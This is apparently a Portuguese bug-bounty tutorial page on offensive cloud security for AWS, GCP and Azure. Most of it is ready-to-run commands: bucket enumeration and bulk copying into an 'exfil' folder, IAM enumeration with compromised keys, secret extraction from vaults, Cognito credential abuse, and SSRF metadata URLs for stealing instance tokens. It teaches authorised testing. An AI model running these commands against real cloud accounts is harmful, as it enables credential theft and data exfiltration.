Seguranca informacao
Cloud Security: AWS, GCP e Azure
Baixar PDFMisconfigurações de cloud, IAM abuse, S3 bucket exploitation, SSRF para metadata, cloud enumeração — offensive security em ambientes AWS, GCP e Azure.
Cloud security é onde bug bounty está se movendo. Empresas migram para AWS/GCP/Azure e a superfície de ataque cresce exponencialmente. Misconfigurações de IAM, storage público e SSRF são as vulnerabilidades mais lucrativas.
AWS — Superfície de Ataque
AWS Attack Surface
├── IAM (Identity & Access Management)
│ ├── Overprivileged roles
│ ├── Access key leakage
│ └── Role assumption
├── S3 (Storage)
│ ├── Public buckets
│ ├── Misconfigured ACLs
│ └── Object-level permissions
├── EC2 (Compute)
│ ├── SSRF → metadata
│ ├── User data leakage
│ └── AMI sharing
├── Lambda (Serverless)
│ ├── Function URL public
│ ├── Environment variables
│ └── Overprivileged execution role
├── API Gateway
│ ├── Missing auth
│ └── Open endpoints
├── Cognito (Auth)
│ ├── Unauthenticated identity pools
│ └── Misconfigured user pools
└── Secrets Manager / Parameter Store
└── Overprivileged accessS3 Bucket Enumeration
# Descobrir buckets
# Método 1: Nome comum
http://target.s3.amazonaws.com
http://target.com.s3.amazonaws.com
http://target-assets.s3.amazonaws.com
http://target-dev.s3.amazonaws.com
http://target-staging.s3.amazonaws.com
http://target-backups.s3.amazonaws.com
http://target-logs.s3.amazonaws.com
http://target-uploads.s3.amazonaws.com
http://target-data.s3.amazonaws.com
http://target-internal.s3.amazonaws.com
# Método 2: Ferramentas
# s3scanner
python3 s3scanner.py --enum target
# cloud_enum
python3 cloud_enum.py -k target -k target.com
# Método 3: Código JavaScript
# Procurar por 's3.amazonaws.com' no source
# Procurar por AWS Access Key IDs (AKIA...)
grep -r "AKIA" . --include="*.js"
grep -r "s3.amazonaws.com" . --include="*.js"
# Verificar permissões de bucket
aws s3 ls s3://target-bucket --no-sign-request # Pública
aws s3 cp s3://target-bucket/config.json . --no-sign-request # Download
aws s3 sync s3://target-bucket ./exfil/ --no-sign-request # Sync completoIAM Enumeration
# Com credenciais comprometidas (de SSRF ou vazamento)
export AWS_ACCESS_KEY_ID=ASIA...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
# Who am I?
aws sts get-caller-identity
# Enumerar permissões
aws iam list-attached-user-policies --user-name target
aws iam list-user-policies --user-name target
aws iam get-policy --policy-arn arn:aws:iam::xxx:policy/xxx
aws iam get-policy-version --policy-arn arn:aws:iam::xxx:policy/xxx --version-id v1
# Enumerar roles assumíveis
aws iam list-roles | jq '.Roles[].RoleName'
aws sts assume-role --role-arn arn:aws:iam::xxx:role/TargetRole --role-session-name hack
# S3 buckets acessíveis
aws s3 ls
aws s3api list-buckets
# Lambda functions
aws lambda list-functions
aws lambda get-function --function-name target-func
# Secrets
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id target-secret
# SSM Parameters
aws ssm describe-parameters
aws ssm get-parameter --name /target/prod/db-password --with-decryptionCognito Misconfiguration
# Descobrir Identity Pool ID no JavaScript
grep -r "cognito" . --include="*.js"
# Ex: ap-southeast-1:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
# Listar identity pools (se conhecido)
aws cognito-identity get-id --identity-pool-id ap-southeast-1:xxx
# Obter credenciais AWS de identity pool (unauthenticated)
aws cognito-identity get-credentials-for-identity --identity-id ap-southeast-1:xxx
# Com as credenciais obtidas, enumerar tudo:
aws s3 ls
aws dynamodb scan --table-name target-tableGCP — Superfície de Ataque
Service Account Enumeration
# Com service account key comprometida
gcloud auth activate-service-account --key-file=sa-key.json
# Projetos acessíveis
gcloud projects list
# Service accounts
gcloud iam service-accounts list
# Permissões
gcloud projects get-iam-policy target-project
gcloud iam service-accounts get-iam-policy [email protected]
# Storage (GCS)
gsutil ls
gsutil ls gs://target-bucket/
gsutil -m cp -r gs://target-bucket/ ./exfil/
# Secrets
gcloud secrets list
gcloud secrets versions access latest --secret=target-secret
# Compute instances
gcloud compute instances list
gcloud compute instances describe instance-1 --zone us-central1-a
# Cloud Functions
gcloud functions list
gcloud functions describe target-funcGCP Metadata via SSRF
# Header obrigatório: Metadata-Flavor: Google
# Token de service account
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Retorna access_token para usar com gcloud
# User data
http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script
# SSH keys
http://metadata.google.internal/computeMetadata/v1/project/attributes/ssh-keys
# Project info
http://metadata.google.internal/computeMetadata/v1/project/project-id
http://metadata.google.internal/computeMetadata/v1/project/numeric-project-idAzure — Superfície de Ataque
Azure Misconfigurations
# Com credenciais
az login
# Subscriptions
az account list
# Resource groups
az group list
# Storage accounts
az storage account list
az storage blob list --account-name targetsa --container-name uploads
# Key Vault secrets
az keyvault secret list --vault-name target-kv
az keyvault secret show --vault-name target-kv --name db-password
# App Service configuration
az webapp config appsettings list --name target-app --resource-group target-rg
# VMs
az vm list
az vm show --name target-vm --resource-group target-rgAzure Metadata via SSRF
# Header obrigatório: Metadata: true
# Instance metadata
http://169.254.169.254/metadata/instance?api-version=2021-02-01
# Managed Identity token
http://169.254.169.254/metadata/identity/oauth2/token?resource=https://management.azure.com/&api-version=2018-02-01
# Retorna access_token
# Token para Azure Key Vault
http://169.254.169.254/metadata/identity/oauth2/token?resource=https://vault.azure.net/&api-version=2018-02-01Cloud Enumeration Tools
# Prowler (AWS security assessment)
prowler aws --profile target
# ScoutSuite (multi-cloud)
scout aws --profile target
scout gcp --project target-project
scout azure --tenant target-tenant
# cloud_enum (bucket enumeration across clouds)
python3 cloud_enum.py -k target -k target.com
# S3Scanner (public bucket detection)
python3 s3scanner.py --enum target
# Pacu (AWS exploitation framework)
pacu
> run iam__enum_users_roles_policies_groups
> run iam__privesc_scan
> run s3__bucket_finder
# WeirdAAL (AWS attack library)
python3 weirdAAL.py -m recon_all -p target-profile
# enumerate-iam (what can this key do?)
python3 enumerate-iam.py --access-key AKIA --secret-key xxxBug Bounty em Cloud
Onde encontrar bugs cloud
1. S3 buckets públicos com dados sensíveis
→ Ler, escrever, deletar (depende da permissão)
→ Payout: $500 — $10.000
2. SSRF → metadata access → IAM credential theft
→ Usar credenciais para acessar outros serviços
→ Payout: $5.000 — $50.000+
3. Cognito identity pool unauthenticated
→ Obter credenciais AWS sem autenticação
→ Payout: $2.000 — $10.000
4. Lambda function URL sem auth
→ Acessar função serverless publicamente
→ Payout: $500 — $5.000
5. API Gateway sem autenticação
→ Endpoints de API sem validação
→ Payout: $500 — $5.000
6. Key Vault / Secrets Manager com acesso amplo
→ Service accounts com secrets em texto
→ Payout: $1.000 — $10.000
7. GitHub/GitLab com AWS keys hardcoded
→ Usar gitleaks/truffleHog
→ Payout: $2.000 — $20.000Referências
Tooling: arsenal do bug bounty hunter
Burp Suite, Nuclei, httpx, subfinder, ffuf, Amass, sqlmap e o stack completo de ferramentas para offensive security e bug bounty.
Mobile Security: Android e iOS
Análise de APK/IPA, interceptação de tráfego mobile, runtime manipulation, Frida hooking, insecure storage, certificate pinning bypass.